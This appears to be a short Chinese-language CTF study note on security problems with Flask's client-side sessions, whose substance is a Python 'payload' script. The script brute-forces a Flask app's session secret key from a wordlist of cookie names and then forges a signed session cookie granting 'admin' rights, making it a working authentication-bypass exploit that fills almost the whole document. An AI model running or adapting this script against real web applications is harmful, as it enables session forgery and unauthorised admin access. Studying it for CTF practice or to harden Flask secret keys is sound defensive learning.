Flask-Session
客户端 session 导致的安全问题
p牛写的一篇文章:
关于客户端session的介绍:
相关payload:
import flask
import hashlib
from sys import argv
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature
cookie = argv[1]
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap",
"shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss",
"biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel",
"wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie",
"lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
real_secret = ''
for secret in cookie_names:
try:
serializer = URLSafeTimedSerializer(
secret_key=secret,
salt='cookie-session',
serializer=TaggedJSONSerializer(),
signer=TimestampSigner,
signer_kwargs={
'key_derivation' : 'hmac',
'digest_method' : hashlib.sha1
}).loads(cookie)
except BadSignature:
continue
print(f'Secret key: {secret}')
real_secret = secret
session = {'very_auth' : 'admin'}
print(URLSafeTimedSerializer(
secret_key=real_secret,
salt='cookie-session',
serializer=TaggedJSONSerializer(),
signer=TimestampSigner,
signer_kwargs={
'key_derivation' : 'hmac',
'digest_method' : hashlib.sha1
}
).dumps(session))